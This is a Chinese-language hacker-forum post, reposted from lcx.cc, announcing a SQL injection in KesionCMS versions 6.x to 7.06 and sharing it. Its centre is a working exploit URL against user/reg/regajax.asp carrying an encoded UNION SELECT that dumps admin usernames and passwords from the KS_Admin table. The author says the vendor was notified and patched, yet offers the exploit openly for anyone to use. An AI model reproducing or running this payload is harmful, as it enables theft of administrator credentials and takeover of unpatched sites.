作者:goingta
网站:http://www.zzfhw.com
某日逛t00ls.net的时候 看到论坛图片随机显示哪里有一张 标题为 科讯 6.x - 7.06 SQL 注射漏洞
点进去看 原来核心会员们又在xxoo
我没权限看 自然是看不了了
仔细看下图片
暴露了存在漏洞的文件名
于是自己也下一套下来看了下
刚学asp 不是很精通
后来还是成功爆出账户密码
拿去官方测试,也还存在
漏洞通知官方,已补。
不敢私藏,分享一下
非主流黑客别用来修改人家主页啊,没得前途
Exp: http://www.zzfhw.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500 |
文章来源于lcx.cc:科讯 6.x - 7.06 SQL 注射漏洞 - 脚本漏洞
相关推荐: 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件!
距事发已有两天有余,跟踪追查近两天,成功侦破一宗牵扯到全国多个大型医疗集团的典型恶性案件! 成功追查到“犯罪团伙”具体信息,并完全摸清楚该“犯罪团伙”具体犯罪方法、思路、以及完整方案,并保存完整证据链! 很抱歉,由于事件的特殊性,具体内情不便公开,这里就不跟大…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论